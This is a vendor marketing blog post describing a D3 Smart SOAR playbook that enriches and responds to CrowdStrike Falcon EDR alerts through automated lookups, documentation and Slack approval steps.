As cyber attacks become more sophisticated and frequent, organizations must ensure that they have a robust security system in place. CrowdStrike Falcon and D3 Smart SOAR (Security Orchestration, Automation and Response) are two such systems that work together to provide comprehensive protection against cyber threats. In this blog post, we will break down a playbook for using CrowdStrike Falcon within D3 Smart SOAR to investigate EDR alerts and orchestrate rapid, effective incident response.
D3 integrates with seven CrowdStrike products out of the box:
Unlike other SOARs, D3’s CrowdStrike integration is built, enhanced, and researched by the largest integration team in the industry. Our clients don’t have to write a single line of code or read through hundreds of pages of API documentation to get their integrations to work. Ours come out of the box and free of charge. Here you’ll see it in action.
The alert used in this demo was created because a PowerShell process was used to download and launch a remote file.
Like all events, the raw data is normalized on ingestion. In the event overview we can see the key fields that have been extracted and mapped to D3 system fields. Normalizing data to D3 system fields enables automation and analysis on artifacts using other tools in your environment.
The playbook consists of several stages, including data extraction, API enrichment, automated lookup, documentation and interactive workflows, and email and Slack approval. The first step involves automatically extracting all relevant data fields related to the original CrowdStrike alert and passing it through D3’s vast library of automation commands. The indicators of value to the analyst here are any information related to the malicious file or the impacted host, and any relevant process information caused by the activity.
In the enrichment stage, the playbook analyzes the host, process, IOCs, and user(s) involved in the alert.
This workflow uses six API calls to:
Moving into the response stage of the incident response (IR) lifecycle, D3’s playbook architecture fully supports auto-documentation and scope optimization features. All the details we just went through have been automatically written to the investigation workspace without any action from the analyst. This ensures that any new investigators coming into the incident can immediately grasp the severity and investigation details that have already been documented.
No IR workflow is complete without notifying your team. D3’s built-in email functionality allows you to conveniently fill in the message body with all the critical details from your investigations. In addition, D3 supports interactive messaging via Slack, allowing team members on Slack channels to directly influence the result of the playbook by selecting Approve or Reject. This helps facilitate swift decision-making and enables the team to respond rapidly to threats.
To summarize, the playbook enabled a rapid and effective response to a malware event using automation. We’ve eliminated almost 100% of the data enrichment time needed to get a complete picture of this alert and we’ve confirmed and remediated the event in just a few minutes, ensuring no breaches occurred. With D3 SOAR and CrowdStrike Falcon working together, organizations can rest assured that they have the best possible defense in place.